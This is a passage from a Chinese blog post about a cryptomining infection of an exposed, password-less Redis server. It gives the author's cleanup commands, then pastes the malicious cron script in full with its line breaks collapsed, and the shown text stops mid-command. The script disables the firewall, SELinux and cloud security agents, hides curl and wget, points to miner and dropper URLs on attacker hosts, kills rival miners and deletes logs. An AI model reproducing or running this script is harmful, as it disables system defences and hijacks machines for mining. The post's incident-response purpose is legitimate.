公网的Redis还敢不设置密码?我看你是疯了( 二 )

权限不让修改 。。 , 使用下面的方法去重新创建一个chattr2好了:
[root@hecs-402944 etc]# cp /usr/bin/chattr /usr/bin/chattr2[root@hecs-402944 etc]# chmod 755 /usr/bin/chattr2[root@hecs-402944 etc]# chattr2 -i /usr/bin/chattr[root@hecs-402944 etc]# chmod 755 /usr/bin/chattr[root@hecs-402944 etc]# ls -la /usr/bin/chattr-rwxr-xr-x 1 root root 11536 9月30 2020 /usr/bin/chattr[root@hecs-402944 etc]# lsattr /usr/bin/chattr -------------e-- /usr/bin/chattr复制代码此时使用chattr2修改权限 , 再次删除定时任务文件 , 就可以成功了 。
chattr2 -ia newinit.sh复制代码停止定时任务 , 居然也没有权限 , 真绝啊~按照下面的操作来 , 首先修改权限:
[root@hecs-402944 etc]# lsattr /var/spool/cron/root----ia-------e-- /var/spool/cron/root[root@hecs-402944 etc]# chattr2 -ia /var/spool/cron/root复制代码删除定时任务,查看发现没有了
[root@hecs-402944 etc]# crontab -r[root@hecs-402944 etc]# crontab -lno crontab for root复制代码重启服务器 , 总算解决了 。
定时任务文件干了啥?我直接贴在这了 , 兄弟们自己看吧 , 看的是触目惊心啊 。
#!/bin/shulimit -n 65535chmod 777 /usr/bin/chattrchmod 777 /bin/chattriptables -Fufw disablesysctl kernel.nmi_watchdog=0echo '0' >/proc/sys/kernel/nmi_watchdogecho 'kernel.nmi_watchdog=0' >>/etc/sysctl.confchattr -iae /root/.ssh/chattr -iae /root/.ssh/authorized_keyschattr -iua /tmp/chattr -iua /var/tmp/rm -rf /tmp/addres*rm -rf /tmp/walle*rm -rf /tmp/keysrm -rf /var/log/syslogcrondir='/var/spool/cron/'"$USER"cont=`cat ${crondir}`ssht=`cat /root/.ssh/authorized_keys`echo 1 > /etc/zzhsrtdir="/etc/zzhs"bbdir="/usr/bin/curl"bbdira="/usr/bin/cd1"ccdir="/usr/bin/wget"ccdira="/usr/bin/wd1"mv /usr/bin/wgettnt /usr/bin/wd1mv /usr/bin/curltnt /usr/bin/cd1mv /usr/bin/wget1 /usr/bin/wd1mv /usr/bin/curl1 /usr/bin/cd1mv /usr/bin/cur /usr/bin/cd1mv /usr/bin/cdl /usr/bin/cd1mv /usr/bin/cdt /usr/bin/cd1mv /usr/bin/xget /usr/bin/wd1mv /usr/bin/wge /usr/bin/wd1mv /usr/bin/wdl /usr/bin/wd1mv /usr/bin/wdt /usr/bin/wd1mv /usr/bin/wget /usr/bin/wd1mv /usr/bin/curl /usr/bin/cd1if ps aux | grep -i '[a]liyun'; then$bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash$bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash$bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash$bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bashpkill aliyun-servicerm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-servicerm -rf /usr/local/aegis*systemctl stop aliyun.servicesystemctl disable aliyun.serviceservice bcm-agent stopyum remove bcm-agent -yapt-get remove bcm-agent -yelif ps aux | grep -i '[y]unjing'; then/usr/local/qcloud/stargate/admin/uninstall.sh/usr/local/qcloud/YunJing/uninst.sh/usr/local/qcloud/monitor/barad/admin/uninstall.shfiif [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitorelseexport ARCH=amd64if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} ]; then/usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} stop && /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} uninstall && rm -rf /usr/local/cloudmonitorelseecho "ali cloud monitor not running"fifisetenforce 0echo SELINUX=disabled >/etc/selinux/configservice apparmor stopsystemctl disable apparmorservice aliyun.service stopsystemctl disable aliyun.serviceps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %rm -rf /usr/local/aegisminer_url="http://195.242.111.238/cleanfda/zzh"miner_url_backup="http://en2an.top:8080/cleanfda/zzh"miner_size="6006304"sh_url="http://195.242.111.238/cleanfda/newinit.sh"sh_url_backup="http://en2an.top:8080/cleanfda/newinit.sh"chattr_size="8000"sleep 1if [ -x "$(command -v t)" ]; thenmv /usr/bin/t /usr/bin/chattrfiif [ -x "$(command -v chattr)" ]; thenchattr -i /usr/bin/ip6networkchattr -i /usr/bin/kswapedchattr -i /usr/bin/irqbalancedchattr -i /usr/bin/rctlclichattr -i /usr/bin/systemd-networkchattr -i /usr/bin/pamdicksecho 1 > /usr/bin/ip6networkecho 2 > /usr/bin/kswapedecho 3 > /usr/bin/irqbalancedecho 4 > /usr/bin/rctlcliecho 5 > /usr/bin/systemd-networkecho 6 > /usr/bin/pamdickschattr +i /usr/bin/ip6networkchattr +i /usr/bin/kswapedchattr +i /usr/bin/irqbalancedchattr +i /usr/bin/rctlclichattr +i /usr/bin/systemd-networkchattr +i /usr/bin/pamdicksfisleep 1kill_miner_proc(){netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :8444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :10008 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %ps.original aux | grep -v grep | grep ':13531' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kworker -c' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "[^" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "/tmp/JAVA" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'netDNS' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 %ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep " []" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "kieuanilam.me" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 %netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED|SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED|SYN_SENT' | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 %pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %pgrep -f xzpauectgr | xargs -I % kill -9 %pgrep -f slxfbkmxtd | xargs -I % kill -9 %pgrep -f mixtape | xargs -I % kill -9 %pgrep -f addnj | xargs -I % kill -9 %pgrep -f 200.68.17.196 | xargs -I % kill -9 %pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 %pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 %pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 %pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 %pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 %pgrep -f honvbsasbf.conf | xargs -I % kill -9 %pgrep -f mqdsflm.cf | xargs -I % kill -9 %pgrep -f lower.sh | xargs -I % kill -9 %pgrep -f ./ppp | xargs -I % kill -9 %pgrep -f cryptonight | xargs -I % kill -9 %pgrep -f ./seervceaess | xargs -I % kill -9 %pgrep -f ./servceaess | xargs -I % kill -9 %pgrep -f ./servceas | xargs -I % kill -9 %pgrep -f ./servcesa | xargs -I % kill -9 %pgrep -f ./vsp | xargs -I % kill -9 %pgrep -f ./jvs | xargs -I % kill -9 %pgrep -f ./pvv | xargs -I % kill -9 %pgrep -f ./vpp | xargs -I % kill -9 %pgrep -f ./pces | xargs -I % kill -9 %pgrep -f ./rspce | xargs -I % kill -9 %pgrep -f ./haveged | xargs -I % kill -9 %pgrep -f ./jiba | xargs -I % kill -9 %pgrep -f ./watchbog | xargs -I % kill -9 %pgrep -f ./A7mA5Gb | xargs -I % kill -9 %pgrep -f kacpi_svc | xargs -I % kill -9 %pgrep -f kswap_svc | xargs -I % kill -9 %pgrep -f kauditd_svc | xargs -I % kill -9 %pgrep -f kpsmoused_svc | xargs -I % kill -9 %pgrep -f kseriod_svc | xargs -I % kill -9 %pgrep -f kthreadd_svc | xargs -I % kill -9 %pgrep -f ksoftirqd_svc | xargs -I % kill -9 %pgrep -f kintegrityd_svc | xargs -I % kill -9 %pgrep -f jawa | xargs -I % kill -9 %pgrep -f oracle.jpg | xargs -I % kill -9 %pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 %pgrep -f 188.209.49.54 | xargs -I % kill -9 %pgrep -f 181.214.87.241 | xargs -I % kill -9 %pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 %pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 %pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 %pgrep -f servim | xargs -I % kill -9 %pgrep -f kblockd_svc | xargs -I % kill -9 %pgrep -f native_svc | xargs -I % kill -9 %pgrep -f ynn | xargs -I % kill -9 %pgrep -f 65ccEJ7 | xargs -I % kill -9 %pgrep -f jmxx | xargs -I % kill -9 %pgrep -f 2Ne80nA | xargs -I % kill -9 %pgrep -f sysstats | xargs -I % kill -9 %pgrep -f systemxlv | xargs -I % kill -9 %pgrep -f watchbog | xargs -I % kill -9 %pgrep -f OIcJi1m | xargs -I % kill -9 %pkill -f bIOSetjenkinspkill -f Loopbackpkill -f apacehapkill -f cryptonightpkill -f mixnerdxpkill -f performedlpkill -f JnKihGjnpkill -f irqba2anc1pkill -f irqba5xnc1pkill -f irqbnc1pkill -f ir29xc1pkill -f connspkill -f irqbalancepkill -f crypto-poolpkill -f XJnRjpkill -f mgwslpkill -f pythnopkill -f jweripkill -f lx26pkill -f NXLAipkill -f BI5zjpkill -f askdljlqwpkill -f minerdpkill -f minergatepkill -f Guard.shpkill -f ysaydhpkill -f bonnspkill -f donnspkill -f kxjdpkill -f Duck.shpkill -f bonn.shpkill -f conn.shpkill -f kworker34pkill -f kw.shpkill -f pro.shpkill -f polkitdpkill -f acpidpkill -f icb5opkill -f nopxipkill -f irqbalanc1pkill -f minerdpkill -f i586pkill -f gddrpkill -f mstxmrpkill -f ddg.2011pkill -f wnTKYgpkill -f deamonpkill -f disk_geniuspkill -f sourplumpkill -f polkitdpkill -f nanoWatchpkill -f zigwpkill -f devtoolpkill -f devtoolspkill -f systemctIpkill -f watchbogpkill -f cryptonightpkill -f sustespkill -f xmrigpkill -f xmrig-cpupkill -f 121.42.151.137pkill -f init12.cfgpkill -f Nginxkpkill -f tmp/wc.confzpkill -f xmrig-notlspkill -f xmr-stakpkill -f suppoiepkill -f zer0day.rupkill -f dbus-daemon--systempkill -f nullcrewpkill -f systemctIpkill -f kworkerdspkill -f init10.cfgpkill -f /wl.confpkill -f crond64pkill -f sustsepkill -f vmlinuzpkill -f exinpkill -f apachiiipkill -f cryptopkill -f tntrechtpkill -f xrpkill -f svcupdatepkill -9 cnrigrm -rf /usr/bin/config.jsonrm -rf /usr/bin/exinrm -rf /tmp/wc.confrm -rf /tmp/log_rotrm -rf /tmp/apachiiirm -rf /tmp/sustserm -rf /tmp/phprm -rf /tmp/p2.confrm -rf /tmp/pprtrm -rf /tmp/ppolrm -rf /tmp/javax/config.shrm -rf /tmp/javax/sshd2rm -rf /tmp/.profilerm -rf /tmp/1.sorm -rf /tmp/kworkerdsrm -rf /tmp/kworkerds3rm -rf /tmp/kworkerdssxrm -rf /tmp/xd.jsonrm -rf /tmp/syslogdrm -rf /tmp/syslogdbrm -rf /tmp/65ccEJ7rm -rf /tmp/jmxxrm -rf /tmp/2Ne80nArm -rf /tmp/dlrm -rf /tmp/ddgrm -rf /tmp/systemxlvrm -rf /tmp/systemctIrm -rf /tmp/.abcrm -rf /tmp/osw.hbrm -rf /tmp/.tmpleverm -rf /tmp/.tmpnewzzrm -rf /tmp/.javarm -rf /tmp/.omedrm -rf /tmp/.tmpcrm -rf /tmp/.tmpleverm -rf /tmp/.tmpnewzzrm -rf /tmp/gates.lodrm -rf /tmp/conf.nrm -rf /tmp/devtoolrm -rf /tmp/devtoolsrm -rf /tmp/fsrm -rf /tmp/.rodrm -rf /tmp/.rod.tgzrm -rf /tmp/.rod.tgz.1rm -rf /tmp/.rod.tgz.2rm -rf /tmp/.merrm -rf /tmp/.mer.tgzrm -rf /tmp/.mer.tgz.1rm -rf /tmp/.hodrm -rf /tmp/.hod.tgzrm -rf /tmp/.hod.tgz.1rm -rf /tmp/84Onmcerm -rf /tmp/C4iLM4Lrm -rf /tmp/lilpiprm -rf /tmp/3lmigMorm -rf /tmp/am8jmBPrm -rf /tmp/tmp.txtrm -rf /tmp/babyrm -rf /tmp/.librm -rf /tmp/systemdrm -rf /tmp/lib.tar.gzrm -rf /tmp/babyrm -rf /tmp/javarm -rf /tmp/j2.confrm -rf /tmp/.mynews1234rm -rf /tmp/a3e12drm -rf /tmp/.ptrm -rf /tmp/.pt.tgzrm -rf /tmp/.pt.tgz.1rm -rf /tmp/gorm -rf /tmp/javarm -rf /tmp/j2.confrm -rf /tmp/.tmpnewasssrm -rf /tmp/javarm -rf /tmp/go.shrm -rf /tmp/go2.shrm -rf /tmp/khugepagedsrm -rf /tmp/.censusqqqqqqqqqrm -rf /tmp/.kerberodsrm -rf /tmp/kerberodsrm -rf /tmp/seasamerm -rf /tmp/touchrm -rf /tmp/.prm -rf /tmp/runtime2.shrm -rf /tmp/runtime.shrm -rf /dev/shm/z3.shrm -rf /dev/shm/z2.shrm -rf /dev/shm/.scrrm -rf /dev/shm/.kerberodsrm -f /etc/ld.so.preloadrm -rf /etc/systemd/system/systemde.service*rm -f /etc/ld.so.preloadrm -f /usr/local/lib/libioset.sochattr -i /etc/ld.so.preloadrm -f /etc/ld.so.preloadsystemctl stop moneroocean_miner.servicesystemctl stop systemde.servicerm -f /usr/local/lib/libioset.sorm -rf /tmp/watchdogsrm -rf /etc/cron.d/Tomcatrm -rf /etc/rc.d/init.d/watchdogsrm -rf /usr/sbin/watchdogsrm -f /tmp/kthrotldsrm -f /etc/rc.d/init.d/kthrotldsrm -rf /tmp/.sysbabyuuuuu12rm -rf /tmp/logo9.jpgrm -rf /tmp/miner.shrm -rf /tmp/nullcrewrm -rf /tmp/procrm -rf /tmp/2.shrm /opt/atlassian/confluence/bin/1.shrm /opt/atlassian/confluence/bin/1.sh.1rm /opt/atlassian/confluence/bin/1.sh.2rm /opt/atlassian/confluence/bin/1.sh.3rm /opt/atlassian/confluence/bin/3.shrm /opt/atlassian/confluence/bin/3.sh.1rm /opt/atlassian/confluence/bin/3.sh.2rm /opt/atlassian/confluence/bin/3.sh.3rm -rf /var/tmp/f41rm -rf /var/tmp/2.shrm -rf /var/tmp/config.jsonrm -rf /var/tmp/xmrigrm -rf /var/tmp/1.sorm -rf /var/tmp/kworkerds3rm -rf /var/tmp/kworkerdssxrm -rf /var/tmp/kworkerdsrm -rf /var/tmp/wc.confrm -rf /var/tmp/nadezhda.rm -rf /var/tmp/nadezhda.armrm -rf /var/tmp/nadezhda.arm.1rm -rf /var/tmp/nadezhda.arm.2rm -rf /var/tmp/nadezhda.x86_64rm -rf /var/tmp/nadezhda.x86_64.1rm -rf /var/tmp/nadezhda.x86_64.2rm -rf /var/tmp/sustse3rm -rf /var/tmp/sustserm -rf /var/tmp/moneroocean/rm -rf /var/tmp/devtoolrm -rf /var/tmp/devtoolsrm -rf /var/tmp/play.shrm -rf /var/tmp/systemctIrm -rf /var/tmp/.javarm 